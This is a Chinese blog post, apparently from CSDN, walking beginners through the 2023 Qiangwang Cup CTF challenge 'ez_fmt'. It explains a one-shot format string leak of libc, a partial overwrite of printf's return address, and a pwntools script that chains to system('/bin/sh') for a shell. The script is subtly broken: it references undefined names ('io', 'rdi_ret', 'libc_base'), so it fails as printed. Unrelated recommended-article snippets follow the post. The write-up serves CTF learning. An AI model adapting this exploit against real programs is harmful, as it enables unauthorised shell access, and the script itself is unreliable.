面向小白详解2023强网杯ez_fmt

最新推荐文章于 2024-07-23 15:42:50 发布
最新推荐文章于 2024-07-23 15:42:50 发布
阅读量351 收藏
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73575406/article/details/136002368
版权

一道栈溢出题,需要掌握:格式化字符串漏洞,rop,对栈的理解。

漏洞:

一次机会的格式化字符串漏洞,输入长度限制在0x30

思路:

以一个常规栈溢出题的思路,如下。

1.获取libc_base

非常简单,找到libc_base的偏移即可,调试发现是第19个(字符串偏移为6)直接“%19$p”打印即可。那么system和sh当然也都出来了。

2.如何执行获取shell呢?

保护除了pie全开,而本题又给了栈地址,libc也出来了,那么想到的是利用字符串漏洞任意写篡改返回地址,main函数返回地址直接改为system(sh)的rop链的肯定不行,因为长度限制了0x30。

这里尝试篡改printf返回地址(第二个printf),将其改为pop3_ret的gadget,因为这个gadget和返回地址只差一字节比较好改。再让我们执行程序0x401205处给的read函数,后来再写入system(sh)到返回地址即可。

脚本:

from pwn import *
from LibcSearcher import *
#p=remote("47.96.229.249",7777)
p=process("./pwn")

context(os = "linux", arch = "amd64", log_level= "debug")
#context(os = "linux", arch = "i386", log_level= "debug")

#elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")

p.recvuntil("There is a gift for you ")
buf_adr = int(p.recv(14), 16)
ret_adr = buf_adr-8
pop_ret = 0x00000000004012ce #hex(206)=0xce
read = 0x401205

payload =  b"%206c%10$hhn%19$p"
payload = payload.ljust(0x18, b'\x00')
payload += p64(0x401205) + p64(ret_adr)
p.sendline(payload)

base = int(io.recv(14), 16) - libc.symbols["__libc_start_main"] - 243

payload = flat(
    {
        0x18 : p64(rdi_ret) + p64(libc_base + libc.search(b"/bin/sh").__next__()),
        0x28 : p64(libc_base + 0x051CD2)
    }
)
p.sendline(payload)

p.interactive()

这里给出了栈的图,方便读者理解脚本

CLan_nad_
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg)
03-09
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg),在使用ffmpeg解码aac的时候,如果使用avcodec_decode_audio4函数解码,那么解码出来的会是AV_SAMPLE_FMT_FLTP 格式的数据( float, 4bit , planar), 如果我们希望...
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
格式化字符串各种泄露覆盖类型 姿势具体讲解
m0_74220442的博客
12-20 983
栈上格式化字符串以下题目的条件:RELRO 保护模式不为 FULL RELRO ,GOT表需要可写FULL RELRO当开启这个之后 got表是无法修改的格式化字符串题目: 强网杯(ez_fmt)📎强网先锋 fmt.pdf通过这题还学会了利用 printf函数就是函数本身内部的返回地址,可以通过调试得到通过这道题理清了两个逻辑:这里我们是覆盖让地址的后四位为0x1203 这里传的是0x1203也就是4594+14+3+2 这里的4594就是%4594c 14指的就是%39$p泄露的地址0x7fffffff
[强网杯2023] 只作了几个小题
weixin_52640415的博客
12-17 2202
格式化字符串 %nc%*d$d%k$n
mplane方式v4l2应用分析 -- VIDIOC_S_FMT(设置图像格式)
ldl617的专栏
09-26 3147
Linux v4l2架构学习总链接 设置图像格式 VIDIOC_S_FMT v4l2应用代码如下: struct v4l2_format fmt; memset(&fmt, 0, sizeof(struct v4l2_format)); fmt.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE; fmt.fmt.pix_mp.width = 2400; fmt.fmt.pix_mp.height = 1920; fmt.fm
2023年第七届强网杯部分WP
qq_65165505的博客
12-18 2804
在这个网站直接记载了2的27次方的阶乘的每一位数字之和对4495662081取个sha256即可。
ffmpeg命令分析-pix_fmt
u012117034的博客
03-14 5507
本系列 以 ffmpeg4.2 源码为准,下载地址:链接:百度网盘提取码:g3k8 本系列主要分析各种 ffmpeg 命令参数 在代码里是如何实现的。a.mp4下载链接:百度网盘,提取码:nl0s 。 命令如下: ffmpeg -vcodec h264 -i a.mp4 -pix_fmt nv12 -vcodec h264_mf -acodec copy a_h264_nvenc.mp4 -y 上面的命令是解码,然后编码,本文不关注编解码,主要分析-pix_fmt nv12参数,由于一些硬件...
FFmpeg学习—ffmpeg 利用 swr_convert 函数将AV_SAMPLE_FMT_S16 转 AV_SAMPLE_FMT_FLTP
热门推荐
XIAIBIANCHENG的专栏
05-30 1万+
在Android 平台下利用AudioRecord 录制音频数据时基于 ENCODING_PCM_16BIT 进行采样,然后在利用ffmpeg 进行编码成aac格式的音频文件,由于最新ffmpeg 库的sample_fmt必须以AV_SAMPLE_FMT_FLTP这种方式进行存储,而ENCODING_PCM_16BIT 是AV_SAMPLE_FMT_S16格式的。如果是单声道的话两者区别不大,都可...
LVGL lv_label_set_text_fmt 显示只有f
weixin_44684950的博客
04-26 3778
LVGL lv_label_set_text_fmt 显示只有f
MEDIA_BUS_FMT各种格式含义
sg656720274的博客
03-10 3319
https://www.kernel.org/doc/html/latest/media/uapi/v4l/subdev-formats.html
BUUCTF之“axb_2019_fmt64”
Probeginner的博客
12-15 3243
64位下格式化字符串漏洞,内存地址任意写
FFMPEG: ‘PIX_FMT_BGR24’ was not declared in this scope
jerryzhouyh的博客
05-30 3254
在新版中用:AV_PIX_FMT_BGR24代替PIX_FMT_BGR24参考链接:https://stackoverflow.com/questions/38846405/ffmpeg-pix-fmt-bgr24-was-not-declared-in-this-scope
FMT.rar_FMT_FMT matlab_The Number_filter coefficient
09-22
this code is used to implement FMT Filter bank trancsiver in matlab. the filter coefficient can be changed also the number of subcarriers.
fmt.rar_FM_FMT_in
07-14
标题中的"fmt.rar_FM_FMT_in"可能是指一个关于FM(调频)信号处理的压缩包文件,其中包含了MATLAB代码来实现对FM信号的操作。"FM"是Frequency Modulation(频率调制)的缩写,是一种广泛应用于广播、通信和其他无线...
FMT.rar_FMT_VHDL 数字频率计_数字频率计
09-20
《基于VHDL的数字频率计设计与FPGA通信模块详解》 数字频率计是电子工程领域中一种常用的测量工具,用于精确测量信号的频率。在现代数字系统设计中,利用可编程逻辑器件(PLD),如Field Programmable Gate Array...
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 646
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
cxyhjl的博客
07-21 570
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 530
一站式云安全托管限时试用 开启全能高效攻防
内网安全:IPC横向
最新发布
8888的博客
07-23 499
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
AV_SAMPLE_FMT_FLTP和AV_SAMPLE_FMT_FLT
12-29
AV_SAMPLE_FMT_FLTP和AV_SAMPLE_FMT_FLT都是FFmpeg中的采样格式类型。 AV_SAMPLE_FMT_FLTP表示浮点型平面采样格式,每个采样点由多个浮点数表示,通常用于音频处理中的高精度计算。 AV_SAMPLE_FMT_FLT表示浮点型非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值